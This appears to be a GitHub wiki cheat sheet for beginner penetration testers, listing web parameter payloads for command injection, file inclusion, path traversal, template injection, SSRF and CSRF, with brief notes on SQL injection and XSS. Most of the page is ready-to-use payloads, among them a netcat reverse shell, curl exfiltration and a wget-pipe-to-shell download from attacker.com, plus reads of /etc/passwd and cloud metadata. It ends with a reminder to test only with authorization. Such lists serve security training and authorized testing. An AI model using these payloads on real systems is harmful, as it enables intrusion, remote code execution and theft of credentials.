Parameter Testing and Vulnerability Scanning - pentestfunctions/Hacking-For-Beginners GitHub Wiki
This document focuses on various techniques for parameter testing and vulnerability scanning in web applications, using example.com for practical examples.
- Enumeration
- Testing Techniques
- Specific Vulnerabilities and Examples
Discovering Parameters: Using browser developer tools and automated crawlers to identify input parameters in web applications.
Example: Test if example.com allows executing system commands via parameters. E.g., appending ; ls to a URL parameter.
Payloads:
; uname -a| whoami& id; ping -c 1 192.168.1.1; netstat -an; curl http://attacker.com$(<command>); python -c 'import socket,subprocess,os'; nc -e /bin/sh attacker_ip 1234; wget http://attacker.com/malicious_script -O- | sh
Example: Check if example.com allows including files via parameters, like ?file=../../../etc/passwd for LFI.
Payloads:
../../../../etc/passwd../../../../var/log/apache2/access.log?file=php://filter/convert.base64-encode/resource=index.php?file=/proc/self/environ../../../../../boot.ini..%2f..%2f..%2fetc%2fpasswd?file=http://attacker.com/malicious_file?file=data://text/plain;base64,<base64_encoded_payload>../../../../../var/mysql/my.cnf?file=ftp://attacker.com/malicious_file
Example: Attempt to access files outside the intended directory, e.g., ?path=../admin/.
Payloads:
../etc/passwd../../admin.php../../../config/db.php..%2F..%2F..%2Fetc%2Fpasswd....///boot.ini..%5C..%5CWindows%5Csystem.ini..%c0%af..%c0%afetc%c0%afpasswd%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd....//....//etc/passwd..\\..\\boot.ini
Example: Identify if example.com's template engine can be exploited, e.g., using {{7*7}} in a parameter.
Payloads:
{{7*'7'}}{{config.items()}}{{''.__class__.__mro__[2].__subclasses__()}}{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('ls').read()}}${7*7}#{7*7}[%'7'*'7'%]{{__import__('os').popen('cat /etc/passwd').read()}}{{''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['system']('id')}}
Example: Test if internal requests can be made via parameters, e.g., ?url=http://localhost/admin.
Payloads:
?url=file:///etc/passwd?url=http://127.0.0.1/?url=http://169.254.169.254/latest/meta-data/?url=gopher://attacker.com:80/_SSRF_?url=dns://localhost?url=dict://localhost:11211?dest=ftp://user:pass@localhost/?uri=ldap://localhost?path=http://[0:0:0:0:0:ffff:127.0.0.1]/?url=file://C:/Windows/win.ini
Example: Check if unauthorized actions can be performed on behalf of an authenticated user on example.com.
Payloads:
<img src="http://example.com/endpoint?param=value" /><form action="http://example.com/endpoint" method="POST"><input type="submit" /></form>- Using
XMLHttpRequestto send POST requests. - Using Fetch API to send requests.
<iframe src="http://example.com/action"></iframe><script>fetch('http://example.com/endpoint', { method: 'POST', body: JSON.stringify({data: 'value'}) })</script><object data="http://example.com/endpoint"></object><link rel="import" href="http://example.com/endpoint"><a href="http://example.com/endpoint" rel="noreferrer">Click me</a><svg onload="fetch('http://example.com/endpoint', {method: 'POST'})"></svg>
-
SQL Injection: Save a BurpSuite request and test with sqlmap:
sqlmap -r request.txt --batch. -
Cross-Site Scripting (XSS): Check for parameters that don't sanitize input, e.g.,
<script>alert('XSS')</script>. - Buffer Overflow: Test if long inputs in parameters cause crashes or unexpected behavior.
- LDAP Injection: Inject LDAP query syntax into input parameters to see if they are processed.
- CORS Misconfiguration: Test if example.com leaks data to unauthorized domains.
- 2FA Bypass: Explore methods like intercepting tokens or logic flaws to bypass 2FA on example.com.
Note: Always ensure that your testing is ethical, legal, and authorized. Unauthorized testing can result in serious legal consequences.